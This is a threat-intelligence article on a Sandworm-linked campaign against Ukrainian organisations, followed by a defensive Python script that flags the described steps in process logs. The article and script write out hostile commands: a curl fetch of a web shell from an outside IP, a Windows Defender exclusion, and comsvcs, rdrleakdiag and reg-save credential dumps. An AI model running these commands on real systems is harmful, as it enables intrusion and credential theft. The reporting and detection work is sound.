Russian Hackers Employ Stealthy Tactics to Infiltrate Government Networks
Ukrainian government organizations are facing persistent cyber threats from Russian-backed actors employing sophisticated evasion techniques to maintain prolonged access to critical networks. Recent investigations have revealed coordinated campaigns targeting essential infrastructure and government entities, with attackers deploying advanced methods that circumvent traditional security defenses.
These operations signify a strategic shift in cyberattack methodologies, focusing on credential harvesting and sensitive information extraction rather than immediate destructive actions. This approach allows threat actors to conduct extensive reconnaissance and maintain a covert presence within networks for extended periods.
Analysts have identified two significant intrusion incidents: a two-month operation against a large business services organization and a week-long campaign targeting local government infrastructure. The attackers exhibit exceptional operational security awareness, minimizing malware deployment and primarily relying on legitimate Windows administration tools and dual-use utilities to evade detection.
The campaign appears linked to Sandworm, a Russian military intelligence unit under the GRU, known for destructive attacks against critical infrastructure, including power grids and satellite communications networks.
Initial Compromise and Persistence Mechanisms
The initial compromise occurred through the deployment of web shells on public-facing servers, likely exploiting unpatched vulnerabilities. Attackers utilized the Localolive web shell to establish persistent backdoor access, enabling remote command execution capabilities.
Living-Off-the-Land Credential Harvesting Techniques
Upon gaining initial access on June 27, 2025, the attackers executed commands through built-in Windows utilities, first fetching an additional web shell into the IIS web root and then adding a Windows Defender exclusion:

```
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads
```
The attackers deliberately excluded the Downloads folder from Windows Defender scanning, an action that requires administrative privileges. They then created scheduled tasks that ran every thirty minutes, using the legitimate rundll32.exe to load comsvcs.dll and dump process memory, from which credentials held in memory could be extracted.
The threat actors specifically targeted KeePass password vault processes through enumeration commands, demonstrating precise targeting of credential repositories.
Evasion continued with the Windows Resource Leak Diagnostic tool (rdrleakdiag), a rarely used built-in utility, to dump process memory; because the tool is seldom covered by detection rules, its use is less likely to be flagged by security monitoring.
Exporting registry hives with the native reg.exe utility yielded additional credential and configuration data.
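As an added detection example (not part of the original report), the script below flags the living-off-the-land steps described above in process-creation telemetry (Sysmon Event ID 1 or Security 4688 style). The sample events are constructed for this example; the first two mirror the commands quoted on the page, the rest are hypothetical, and the rule set and the IIS worker-process check are this example's own assumptions.

```python
"""Flag living-off-the-land credential-harvesting steps in process-creation events."""
import re

# Constructed sample events (not from the report). The first two mirror the
# commands quoted on the page; the remaining command lines are hypothetical.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "w3wp.exe", "cmdline":
     r"cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx"},
    {"pid": 4188, "parent": "w3wp.exe", "cmdline":
     r"powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads"},
    {"pid": 5010, "parent": "svchost.exe", "cmdline":
     r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 640 C:\Users\Public\svc.dmp full"},
    {"pid": 5022, "parent": "cmd.exe", "cmdline": r"rdrleakdiag.exe /p 640 /o C:\Users\Public"},
    {"pid": 5030, "parent": "cmd.exe", "cmdline": r"reg.exe save HKLM\SAM C:\Users\Public\sam.hiv"},
    {"pid": 6001, "parent": "explorer.exe", "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

# Assumed rules, one per technique named in the text. Each matches the
# command line of a process-creation event (case-insensitive).
RULES = {
    "defender_exclusion_added": re.compile(r"add-mppreference\b.*-exclusionpath", re.I),
    "comsvcs_minidump": re.compile(r"rundll32.*comsvcs\.dll.*minidump", re.I),
    "rdrleakdiag_executed": re.compile(r"\brdrleakdiag(\.exe)?\b", re.I),  # rare tool: any use is worth review
    "registry_hive_saved": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I),
    "file_dropped_in_webroot": re.compile(r">\s*c:\\inetpub\\wwwroot\\", re.I),
}

# Assumption: the IIS worker process should not be spawning shells; a child
# of w3wp.exe is the typical footprint of a web shell executing commands.
WEB_WORKERS = {"w3wp.exe"}


def match_event(event):
    """Return the names of all rules that fire for one process-creation event."""
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    if event["parent"].lower() in WEB_WORKERS:
        hits.append("web_worker_spawned_process")
    return hits


def triage(events):
    """Map pid -> list of rule hits, keeping only events that matched something."""
    return {e["pid"]: hits for e in events if (hits := match_event(e))}


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

Feeding real 4688/Sysmon exports into `triage` gives a quick first pass; correlate the hits by host and time, since the page's point is that each step looks benign on its own.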
This campaign showcases threat actors prioritizing stealth over speed, employing legitimate administration tools to maintain attribution ambiguity while systematically harvesting sensitive organizational data throughout extended network access periods.